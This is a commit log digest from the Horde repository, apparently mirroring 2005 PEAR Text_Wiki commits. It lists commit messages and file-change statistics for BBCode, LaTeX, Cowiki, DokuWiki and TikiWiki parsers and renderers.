    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190768 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/dd862e0bf8ab50a7761c09446c75eeef4d1d3351

-----------------------------------------------------------------------

commit 5fbb551db3cdb0fc256524c5ebe8c46b259a1907
Author: bertrand Gugger 
Date:   Sat Jul 16 04:56:46 2005 +0000

    Headers + post synchronization transmits nesting depth
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190769 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse.php | 142 +++++++++++++++++++++------------------------
 1 file changed, 66 insertions(+), 76 deletions(-)

http://github.com/horde/horde/commit/5fbb551db3cdb0fc256524c5ebe8c46b259a1907

-----------------------------------------------------------------------

commit 38c4a67de32de8c852425b6afa72e41ecacd5a06
Author: bertrand Gugger 
Date:   Sat Jul 16 05:01:35 2005 +0000

    Headers, nesting depth for synchStartEnd() and return null
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190770 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse/Colortext.php | 116 ++++++++++++++++-------------------
 1 file changed, 53 insertions(+), 63 deletions(-)

http://github.com/horde/horde/commit/38c4a67de32de8c852425b6afa72e41ecacd5a06

-----------------------------------------------------------------------

commit e47950ac52af0e95a9c621888fe951ef592035a1
Author: bertrand Gugger 
Date:   Sat Jul 16 05:30:12 2005 +0000

    Class header, calculate offset if synchStartEnd() changes source + error return
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190771 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse.php | 21 ++++++++++++++++-----
 1 file changed, 16 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/e47950ac52af0e95a9c621888fe951ef592035a1

-----------------------------------------------------------------------

commit 9f22051947d16fd772ca76c1165552858792ce8d
Author: bertrand Gugger 
Date:   Sat Jul 16 05:57:10 2005 +0000

    Headers
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190774 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Render/Xhtml/Font.php | 45 +++++++++++++++++++++++++---------
 1 file changed, 33 insertions(+), 12 deletions(-)

http://github.com/horde/horde/commit/9f22051947d16fd772ca76c1165552858792ce8d

-----------------------------------------------------------------------

commit 725a2f4b344c6f08b32b76e45cb9b31bcea53772
Author: bertrand Gugger 
Date:   Sat Jul 16 06:22:06 2005 +0000

    Class header
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190775 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse/Colortext.php | 18 +++++++++++++++---
 1 file changed, 15 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/725a2f4b344c6f08b32b76e45cb9b31bcea53772

-----------------------------------------------------------------------

commit 9964b8fbf6882a06d09d008cbd780a9cbe3078a0
Author: bertrand Gugger 
Date:   Sat Jul 16 07:16:03 2005 +0000

    Headers
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190776 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse/Font.php | 121 ++++++++++++++++++++--------------------
 1 file changed, 59 insertions(+), 62 deletions(-)

http://github.com/horde/horde/commit/9964b8fbf6882a06d09d008cbd780a9cbe3078a0

-----------------------------------------------------------------------

commit 6f8f51154a99edea5979bf8a2f38164d80e57b8d
Author: bertrand Gugger 
Date:   Sat Jul 16 07:20:09 2005 +0000

    SynchStartEnd() with nesting depth and return null
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190777 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse/Font.php | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/6f8f51154a99edea5979bf8a2f38164d80e57b8d

-----------------------------------------------------------------------

commit c486b8df9e217f71c16c47be367fc373ca2049d1
Author: bertrand Gugger 
Date:   Sat Jul 16 08:13:43 2005 +0000

    Request #4520  	Additional space confuses image tag, adapted regexp
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190778 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Image.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/c486b8df9e217f71c16c47be367fc373ca2049d1

-----------------------------------------------------------------------

commit 55ba88b434c28cff29242ab98d9da42eaf7f132a
Author: bertrand Gugger 
Date:   Sat Jul 16 09:06:52 2005 +0000

    Request #4634  	Code block title/filename, uses conf css_filename
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190779 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Code.php | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/55ba88b434c28cff29242ab98d9da42eaf7f132a

-----------------------------------------------------------------------

commit edabaa9d20ecdc4385bb76feb8b3426c10f370d9
Author: bertrand Gugger 
Date:   Sat Jul 16 09:27:09 2005 +0000

    sorry, forgot debug output
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190780 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Code.php | 2 --
 1 file changed, 2 deletions(-)

http://github.com/horde/horde/commit/edabaa9d20ecdc4385bb76feb8b3426c10f370d9

-----------------------------------------------------------------------

commit e1e0d4f672a56516c115915911754e146742657c
Author: bertrand Gugger 
Date:   Sat Jul 16 16:31:56 2005 +0000

    some more tests
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190806 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/BBtest.txt         | 7 +++++--
 doc/test_Text_Wiki.php | 3 ++-
 2 files changed, 7 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/e1e0d4f672a56516c115915911754e146742657c

-----------------------------------------------------------------------

commit 3f2cd349aef295fca78136d27bac6cf6271f9303
Author: bertrand Gugger 
Date:   Sun Jul 17 11:58:22 2005 +0000

    Headers
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190822 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse/Bold.php      | 91 +++++++++++++++++++-----------------
 Text/Wiki/BBCode/Parse/Italic.php    | 91 +++++++++++++++++++-----------------
 Text/Wiki/BBCode/Parse/Underline.php | 91 +++++++++++++++++++-----------------
 3 files changed, 144 insertions(+), 129 deletions(-)

http://github.com/horde/horde/commit/3f2cd349aef295fca78136d27bac6cf6271f9303

-----------------------------------------------------------------------

commit 6020aa4fd355cf09bfcd5c8b8bf51acd955e1384
Author: bertrand Gugger 
Date:   Sun Jul 17 19:40:59 2005 +0000

    Initial version of quoted blocks for BBCode
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190832 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse/Blockquote.php | 105 ++++++++++++++++++++++++++++++++++
 1 file changed, 105 insertions(+)
 create mode 100644 Text/Wiki/BBCode/Parse/Blockquote.php

http://github.com/horde/horde/commit/6020aa4fd355cf09bfcd5c8b8bf51acd955e1384

-----------------------------------------------------------------------

commit be118b1debdc384666d46a9039e90ac99aa1a0e9
Author: bertrand Gugger 
Date:   Sun Jul 17 20:43:49 2005 +0000

    Initial version of code rule parser dor BBCode
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190835 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse/Code.php | 64 +++++++++++++++++++++++++++++++++++++++++
 1 file changed, 64 insertions(+)
 create mode 100644 Text/Wiki/BBCode/Parse/Code.php

http://github.com/horde/horde/commit/be118b1debdc384666d46a9039e90ac99aa1a0e9

-----------------------------------------------------------------------

commit 89c892bbb75e91ed3f1f37ce4e976ef5d2ee0866
Author: bertrand Gugger 
Date:   Mon Jul 18 13:58:22 2005 +0000

    Include inherited class !
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190895 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Bold.php   | 4 ++--
 Text/Wiki/Render/Latex/Italic.php | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/89c892bbb75e91ed3f1f37ce4e976ef5d2ee0866

-----------------------------------------------------------------------

commit 37abc6313a5878f419b66fa5abb8d1893815f566
Author: bertrand Gugger 
Date:   Mon Jul 18 14:43:19 2005 +0000

    Sorry for the last empty line and . without spaces
    Note: headers will be done as a whole
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190900 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Bold.php   | 2 +-
 Text/Wiki/Render/Latex/Italic.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/37abc6313a5878f419b66fa5abb8d1893815f566

-----------------------------------------------------------------------

commit a0569051acaef9cc422e6f0d41b2406b6b26ef76
Author: bertrand Gugger 
Date:   Mon Jul 18 15:16:48 2005 +0000

    No more ugly include, actually rendering latex,
    other classes for Latex renderer to be done (currently Xhtml) ....
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190906 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Bold.php   | 28 ++++++++++++++++++++++++++--
 Text/Wiki/Render/Latex/Italic.php | 25 ++++++++++++++++++++++++-
 2 files changed, 50 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/a0569051acaef9cc422e6f0d41b2406b6b26ef76

-----------------------------------------------------------------------

commit 354162c79c2295cf45329e7b33555ef26b6672e6
Author: bertrand Gugger 
Date:   Mon Jul 18 15:25:00 2005 +0000

    Corrected inherits
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190908 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Bold.php   | 2 +-
 Text/Wiki/Render/Latex/Italic.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/354162c79c2295cf45329e7b33555ef26b6672e6

-----------------------------------------------------------------------

commit cd216f7dd79c136309b970a7b9c1dd7cad028358
Author: bertrand Gugger 
Date:   Mon Jul 18 16:32:31 2005 +0000

    Latex renderer for font rule
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190922 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Render/Latex/Font.php | 73 ++++++++++++++++++++++++++++++++++
 1 file changed, 73 insertions(+)
 create mode 100644 Text/Wiki/BBCode/Render/Latex/Font.php

http://github.com/horde/horde/commit/cd216f7dd79c136309b970a7b9c1dd7cad028358

-----------------------------------------------------------------------

commit 68c6bdf6c2f8c1d0c21f7a0d616fac3200587ccc
Author: bertrand Gugger 
Date:   Mon Jul 18 16:35:50 2005 +0000

    Test data completed ,
    the test script works now not only as cli but also from HTTP
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190923 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/BBtest.txt         |  12 +++++-
 doc/test_Text_Wiki.php | 114 +++++++++++++++++++++++++++++++++++++++++++------
 2 files changed, 112 insertions(+), 14 deletions(-)

http://github.com/horde/horde/commit/68c6bdf6c2f8c1d0c21f7a0d616fac3200587ccc

-----------------------------------------------------------------------

commit c18de9e57acf5d66e1c9dfbbc39a33c4ebbcb57f
Author: bertrand Gugger 
Date:   Mon Jul 18 17:01:04 2005 +0000

    Removed "ugly" dirname() in require_once
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 190925 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/c18de9e57acf5d66e1c9dfbbc39a33c4ebbcb57f

-----------------------------------------------------------------------

commit 4afd5015da472f27b8e719464668e3d38071b18c
Author: bertrand Gugger 
Date:   Tue Jul 19 20:27:18 2005 +0000

    No more change include path, check running on command line if 'cli' ... and more
    also, but it's minor, the test interface is finished and I'm happy with it
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191036 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/test_Text_Wiki.php | 85 +++++++++++++++++++++++++++++++++-----------------
 1 file changed, 56 insertions(+), 29 deletions(-)

http://github.com/horde/horde/commit/4afd5015da472f27b8e719464668e3d38071b18c

-----------------------------------------------------------------------

commit 53b956f86a8e4506a7de5d7c243203ad485dc887
Author: bertrand Gugger 
Date:   Wed Jul 20 09:32:12 2005 +0000

    Enabled the default Paragraph rule
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191056 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/53b956f86a8e4506a7de5d7c243203ad485dc887

-----------------------------------------------------------------------

commit b942826c44c8a8c90b696ece36d3c927f4ee4ee7
Author: bertrand Gugger 
Date:   Wed Jul 20 10:08:24 2005 +0000

    Ouch !! Simple quotes don't interpret variables, mea culpa
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191058 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Code.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/b942826c44c8a8c90b696ece36d3c927f4ee4ee7

-----------------------------------------------------------------------

commit 2774806024e7d25cd7c8b9a2764d8a920a07af39
Author: bertrand Gugger 
Date:   Wed Jul 20 14:06:01 2005 +0000

    Some more cleaning, introduced CSS
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191070 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/test_Text_Wiki.php | 40 +++++++++++++++++++++++-----------------
 1 file changed, 23 insertions(+), 17 deletions(-)

http://github.com/horde/horde/commit/2774806024e7d25cd7c8b9a2764d8a920a07af39

-----------------------------------------------------------------------

commit 1fdcadf0724a81a4bb7eb9ffaa5f7af8f9d62aa9
Author: bertrand Gugger 
Date:   Thu Jul 21 07:59:47 2005 +0000

    Typo
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191117 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Render/Latex/Font.php | 2 +-
 Text/Wiki/BBCode/Render/Xhtml/Font.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/1fdcadf0724a81a4bb7eb9ffaa5f7af8f9d62aa9

-----------------------------------------------------------------------

commit af846d6ec7d073f7c65ea69ed5cf86b0633a4723
Author: bertrand Gugger 
Date:   Thu Jul 21 08:20:01 2005 +0000

    Plain Font rule renderer
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191119 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Render/Plain/Font.php | 44 ++++++++++++++++++++++++++++++++++
 1 file changed, 44 insertions(+)
 create mode 100644 Text/Wiki/BBCode/Render/Plain/Font.php

http://github.com/horde/horde/commit/af846d6ec7d073f7c65ea69ed5cf86b0633a4723

-----------------------------------------------------------------------

commit 2556a3aeba8ad6195459a3f9d7fcbe69cb97d7c9
Author: Justin Patrin 
Date:   Thu Jul 21 20:56:15 2005 +0000

    Checking in Cowiki, DokuWiki, and TikiWiki parsers and renderers
    Note: some of these rules depend on extensions I have made to some of the rules (such as anchor)
    I have also included an extended Text_Wiki class for Tiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191168 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Cowiki/Anchor.php       |  88 +++++++++
 Text/Wiki/Parse/Cowiki/Blockquote.php   | 180 ++++++++++++++++++
 Text/Wiki/Parse/Cowiki/Bold.php         |  79 ++++++++
 Text/Wiki/Parse/Cowiki/Break.php        |  73 +++++++
 Text/Wiki/Parse/Cowiki/Center.php       |  79 ++++++++
 Text/Wiki/Parse/Cowiki/Code.php         |  99 ++++++++++
 Text/Wiki/Parse/Cowiki/Colortext.php    |  90 +++++++++
 Text/Wiki/Parse/Cowiki/Deflist.php      | 123 ++++++++++++
 Text/Wiki/Parse/Cowiki/Delimiter.php    |  80 ++++++++
 Text/Wiki/Parse/Cowiki/Embed.php        | 107 +++++++++++
 Text/Wiki/Parse/Cowiki/Emphasis.php     |  81 ++++++++
 Text/Wiki/Parse/Cowiki/Freelink.php     |  74 ++++++++
 Text/Wiki/Parse/Cowiki/Function.php     | 142 ++++++++++++++
 Text/Wiki/Parse/Cowiki/Heading.php      | 107 +++++++++++
 Text/Wiki/Parse/Cowiki/Horiz.php        |  70 +++++++
 Text/Wiki/Parse/Cowiki/Html.php         |  76 ++++++++
 Text/Wiki/Parse/Cowiki/Image.php        |  85 +++++++++
 Text/Wiki/Parse/Cowiki/Include.php      | 100 ++++++++++
 Text/Wiki/Parse/Cowiki/Interwiki.php    | 138 ++++++++++++++
 Text/Wiki/Parse/Cowiki/Italic.php       |  79 ++++++++
 Text/Wiki/Parse/Cowiki/List.php         | 246 ++++++++++++++++++++++++
 Text/Wiki/Parse/Cowiki/Newline.php      |  75 ++++++++
 Text/Wiki/Parse/Cowiki/Paragraph.php    | 146 ++++++++++++++
 Text/Wiki/Parse/Cowiki/Phplookup.php    |  73 +++++++
 Text/Wiki/Parse/Cowiki/Prefilter.php    |  78 ++++++++
 Text/Wiki/Parse/Cowiki/Raw.php          |  72 +++++++
 Text/Wiki/Parse/Cowiki/Revise.php       | 170 +++++++++++++++++
 Text/Wiki/Parse/Cowiki/Strong.php       |  85 +++++++++
 Text/Wiki/Parse/Cowiki/Subscript.php    |  79 ++++++++
 Text/Wiki/Parse/Cowiki/Superscript.php  |  79 ++++++++
 Text/Wiki/Parse/Cowiki/Table.php        | 214 +++++++++++++++++++++
 Text/Wiki/Parse/Cowiki/Tighten.php      |  49 +++++
 Text/Wiki/Parse/Cowiki/Toc.php          |  93 +++++++++
 Text/Wiki/Parse/Cowiki/Tt.php           |  84 ++++++++
 Text/Wiki/Parse/Cowiki/Underline.php    |  79 ++++++++
 Text/Wiki/Parse/Cowiki/Url.php          | 281 +++++++++++++++++++++++++++
 Text/Wiki/Parse/Cowiki/Wikilink.php     | 217 +++++++++++++++++++++
 Text/Wiki/Parse/Doku/Anchor.php         |  88 +++++++++
 Text/Wiki/Parse/Doku/Blockquote.php     | 180 ++++++++++++++++++
 Text/Wiki/Parse/Doku/Bold.php           |  79 ++++++++
 Text/Wiki/Parse/Doku/Break.php          |  73 +++++++
 Text/Wiki/Parse/Doku/Center.php         |  79 ++++++++
 Text/Wiki/Parse/Doku/Code.php           |  95 ++++++++++
 Text/Wiki/Parse/Doku/Colortext.php      |  90 +++++++++
 Text/Wiki/Parse/Doku/Deflist.php        | 123 ++++++++++++
 Text/Wiki/Parse/Doku/Delimiter.php      |  80 ++++++++
 Text/Wiki/Parse/Doku/Embed.php          | 107 +++++++++++
 Text/Wiki/Parse/Doku/Emphasis.php       |  85 +++++++++
 Text/Wiki/Parse/Doku/Freelink.php       | 132 +++++++++++++
 Text/Wiki/Parse/Doku/Function.php       | 142 ++++++++++++++
 Text/Wiki/Parse/Doku/Heading.php        | 107 +++++++++++
 Text/Wiki/Parse/Doku/Horiz.php          |  70 +++++++
 Text/Wiki/Parse/Doku/Html.php           |  75 ++++++++
 Text/Wiki/Parse/Doku/Image.php          |  91 +++++++++
 Text/Wiki/Parse/Doku/Include.php        | 101 ++++++++++
 Text/Wiki/Parse/Doku/Interwiki.php      |  96 ++++++++++
 Text/Wiki/Parse/Doku/Italic.php         |  84 ++++++++
 Text/Wiki/Parse/Doku/List.php           | 248 ++++++++++++++++++++++++
 Text/Wiki/Parse/Doku/Newline.php        |  75 ++++++++
 Text/Wiki/Parse/Doku/Paragraph.php      | 146 ++++++++++++++
 Text/Wiki/Parse/Doku/Phplookup.php      |  74 ++++++++
 Text/Wiki/Parse/Doku/Prefilter.php      |  78 ++++++++
 Text/Wiki/Parse/Doku/Raw.php            |  87 +++++++++
 Text/Wiki/Parse/Doku/Revise.php         | 168 ++++++++++++++++
 Text/Wiki/Parse/Doku/Strong.php         |  90 +++++++++
 Text/Wiki/Parse/Doku/Subscript.php      |  79 ++++++++
 Text/Wiki/Parse/Doku/Superscript.php    |  79 ++++++++
 Text/Wiki/Parse/Doku/Table.php          | 239 +++++++++++++++++++++++
 Text/Wiki/Parse/Doku/Tighten.php        |  49 +++++
 Text/Wiki/Parse/Doku/Toc.php            |  84 ++++++++
 Text/Wiki/Parse/Doku/Tt.php             |  84 ++++++++
 Text/Wiki/Parse/Doku/Underline.php      |  79 ++++++++
 Text/Wiki/Parse/Doku/Url.php            | 326 ++++++++++++++++++++++++++++++++
 Text/Wiki/Parse/Doku/Wikilink.php       | 116 ++++++++++++
 Text/Wiki/Parse/Tiki/Anchor.php         |  89 +++++++++
 Text/Wiki/Parse/Tiki/Blockquote.php     | 181 ++++++++++++++++++
 Text/Wiki/Parse/Tiki/Bold.php           |  81 ++++++++
 Text/Wiki/Parse/Tiki/Box.php            |  81 ++++++++
 Text/Wiki/Parse/Tiki/Break.php          |  74 ++++++++
 Text/Wiki/Parse/Tiki/Center.php         |  80 ++++++++
 Text/Wiki/Parse/Tiki/Code.php           | 116 ++++++++++++
 Text/Wiki/Parse/Tiki/Colortext.php      |  91 +++++++++
 Text/Wiki/Parse/Tiki/Deflist.php        | 124 ++++++++++++
 Text/Wiki/Parse/Tiki/Delimiter.php      |  82 ++++++++
 Text/Wiki/Parse/Tiki/Embed.php          | 108 +++++++++++
 Text/Wiki/Parse/Tiki/Emphasis.php       |  87 +++++++++
 Text/Wiki/Parse/Tiki/Freelink.php       | 131 +++++++++++++
 Text/Wiki/Parse/Tiki/Function.php       | 143 ++++++++++++++
 Text/Wiki/Parse/Tiki/Heading.php        | 132 +++++++++++++
 Text/Wiki/Parse/Tiki/Horiz.php          |  72 +++++++
 Text/Wiki/Parse/Tiki/Html.php           |  77 ++++++++
 Text/Wiki/Parse/Tiki/Image.php          | 114 +++++++++++
 Text/Wiki/Parse/Tiki/Include.php        | 102 ++++++++++
 Text/Wiki/Parse/Tiki/Interwiki.php      | 140 ++++++++++++++
 Text/Wiki/Parse/Tiki/Italic.php         |  87 +++++++++
 Text/Wiki/Parse/Tiki/List.php           | 250 ++++++++++++++++++++++++
 Text/Wiki/Parse/Tiki/Newline.php        |  77 ++++++++
 Text/Wiki/Parse/Tiki/Page.php           |  45 +++++
 Text/Wiki/Parse/Tiki/Paragraph.php      | 148 +++++++++++++++
 Text/Wiki/Parse/Tiki/Phplookup.php      |  73 +++++++
 Text/Wiki/Parse/Tiki/Plugin.php         |  68 +++++++
 Text/Wiki/Parse/Tiki/Prefilter.php      |  80 ++++++++
 Text/Wiki/Parse/Tiki/Preformatted.php   |  74 ++++++++
 Text/Wiki/Parse/Tiki/Raw.php            |  74 ++++++++
 Text/Wiki/Parse/Tiki/Revise.php         | 147 ++++++++++++++
 Text/Wiki/Parse/Tiki/Specialchar.php    |  49 +++++
 Text/Wiki/Parse/Tiki/Strong.php         |  92 +++++++++
 Text/Wiki/Parse/Tiki/Subscript.php      |  82 ++++++++
 Text/Wiki/Parse/Tiki/Superscript.php    |  82 ++++++++
 Text/Wiki/Parse/Tiki/Table.php          | 235 +++++++++++++++++++++++
 Text/Wiki/Parse/Tiki/Tighten.php        |  51 +++++
 Text/Wiki/Parse/Tiki/Titlebar.php       |  45 +++++
 Text/Wiki/Parse/Tiki/Toc.php            |  82 ++++++++
 Text/Wiki/Parse/Tiki/Tt.php             |  86 +++++++++
 Text/Wiki/Parse/Tiki/Underline.php      |  81 ++++++++
 Text/Wiki/Parse/Tiki/Url.php            | 293 ++++++++++++++++++++++++++++
 Text/Wiki/Parse/Tiki/Wikilink.php       | 217 +++++++++++++++++++++
 Text/Wiki/Render/Cowiki/Anchor.php      |  23 +++
 Text/Wiki/Render/Cowiki/Blockquote.php  |  23 +++
 Text/Wiki/Render/Cowiki/Bold.php        |  23 +++
 Text/Wiki/Render/Cowiki/Box.php         |  33 ++++
 Text/Wiki/Render/Cowiki/Break.php       |  24 +++
 Text/Wiki/Render/Cowiki/Center.php      |  23 +++
 Text/Wiki/Render/Cowiki/Code.php        |  23 +++
 Text/Wiki/Render/Cowiki/Colortext.php   |  23 +++
 Text/Wiki/Render/Cowiki/Deflist.php     |  23 +++
 Text/Wiki/Render/Cowiki/Delimiter.php   |  23 +++
 Text/Wiki/Render/Cowiki/Embed.php       |  23 +++
 Text/Wiki/Render/Cowiki/Emphasis.php    |  23 +++
 Text/Wiki/Render/Cowiki/Freelink.php    |   9 +
 Text/Wiki/Render/Cowiki/Function.php    |  25 +++
 Text/Wiki/Render/Cowiki/Heading.php     |  13 ++
 Text/Wiki/Render/Cowiki/Horiz.php       |  23 +++
 Text/Wiki/Render/Cowiki/Html.php        |  23 +++
 Text/Wiki/Render/Cowiki/Image.php       |  23 +++
 Text/Wiki/Render/Cowiki/Include.php     |   8 +
 Text/Wiki/Render/Cowiki/Interwiki.php   |  23 +++
 Text/Wiki/Render/Cowiki/Italic.php      |  23 +++
 Text/Wiki/Render/Cowiki/List.php        |  56 ++++++
 Text/Wiki/Render/Cowiki/Newline.php     |  13 ++
 Text/Wiki/Render/Cowiki/Paragraph.php   |  23 +++
 Text/Wiki/Render/Cowiki/Phplookup.php   |  25 +++
 Text/Wiki/Render/Cowiki/Prefilter.php   |  40 ++++
 Text/Wiki/Render/Cowiki/Raw.php         |  23 +++
 Text/Wiki/Render/Cowiki/Revise.php      |  36 ++++
 Text/Wiki/Render/Cowiki/Strong.php      |  23 +++
 Text/Wiki/Render/Cowiki/Subscript.php   |  29 +++
 Text/Wiki/Render/Cowiki/Superscript.php |  29 +++
 Text/Wiki/Render/Cowiki/Table.php       |  55 ++++++
 Text/Wiki/Render/Cowiki/Tighten.php     |  10 +
 Text/Wiki/Render/Cowiki/Toc.php         |  25 +++
 Text/Wiki/Render/Cowiki/Tt.php          |  29 +++
 Text/Wiki/Render/Cowiki/Underline.php   |  23 +++
 Text/Wiki/Render/Cowiki/Url.php         |  28 +++
 Text/Wiki/Render/Cowiki/Wikilink.php    |  29 +++
 Text/Wiki/Render/Doku/Anchor.php        |  33 ++++
 Text/Wiki/Render/Doku/Blockquote.php    |  35 ++++
 Text/Wiki/Render/Doku/Bold.php          |  23 +++
 Text/Wiki/Render/Doku/Box.php           |  34 ++++
 Text/Wiki/Render/Doku/Break.php         |  24 +++
 Text/Wiki/Render/Doku/Center.php        |  29 +++
 Text/Wiki/Render/Doku/Code.php          |  23 +++
 Text/Wiki/Render/Doku/Colortext.php     |  52 +++++
 Text/Wiki/Render/Doku/Deflist.php       |  23 +++
 Text/Wiki/Render/Doku/Delimiter.php     |  23 +++
 Text/Wiki/Render/Doku/Embed.php         |  23 +++
 Text/Wiki/Render/Doku/Emphasis.php      |  23 +++
 Text/Wiki/Render/Doku/Freelink.php      |   9 +
 Text/Wiki/Render/Doku/Function.php      |  70 +++++++
 Text/Wiki/Render/Doku/Heading.php       |  11 ++
 Text/Wiki/Render/Doku/Horiz.php         |  23 +++
 Text/Wiki/Render/Doku/Html.php          |  23 +++
 Text/Wiki/Render/Doku/Image.php         |  39 ++++
 Text/Wiki/Render/Doku/Include.php       |   8 +
 Text/Wiki/Render/Doku/Interwiki.php     |  23 +++
 Text/Wiki/Render/Doku/Italic.php        |  23 +++
 Text/Wiki/Render/Doku/List.php          |  56 ++++++
 Text/Wiki/Render/Doku/Newline.php       |  13 ++
 Text/Wiki/Render/Doku/Paragraph.php     |  23 +++
 Text/Wiki/Render/Doku/Phplookup.php     |  25 +++
 Text/Wiki/Render/Doku/Prefilter.php     |  40 ++++
 Text/Wiki/Render/Doku/Raw.php           |  23 +++
 Text/Wiki/Render/Doku/Revise.php        |  36 ++++
 Text/Wiki/Render/Doku/Strong.php        |  23 +++
 Text/Wiki/Render/Doku/Subscript.php     |  29 +++
 Text/Wiki/Render/Doku/Superscript.php   |  29 +++
 Text/Wiki/Render/Doku/Table.php         |  96 ++++++++++
 Text/Wiki/Render/Doku/Tighten.php       |  10 +
 Text/Wiki/Render/Doku/Toc.php           |  26 +++
 Text/Wiki/Render/Doku/Tt.php            |  29 +++
 Text/Wiki/Render/Doku/Underline.php     |  23 +++
 Text/Wiki/Render/Doku/Url.php           |  28 +++
 Text/Wiki/Render/Doku/Wikilink.php      |  29 +++
 Text/Wiki/Render/Tiki/Anchor.php        |  29 +++
 Text/Wiki/Render/Tiki/Blockquote.php    |  35 ++++
 Text/Wiki/Render/Tiki/Bold.php          |  23 +++
 Text/Wiki/Render/Tiki/Box.php           |  29 +++
 Text/Wiki/Render/Tiki/Break.php         |  24 +++
 Text/Wiki/Render/Tiki/Center.php        |  29 +++
 Text/Wiki/Render/Tiki/Code.php          |  27 +++
 Text/Wiki/Render/Tiki/Colortext.php     |  52 +++++
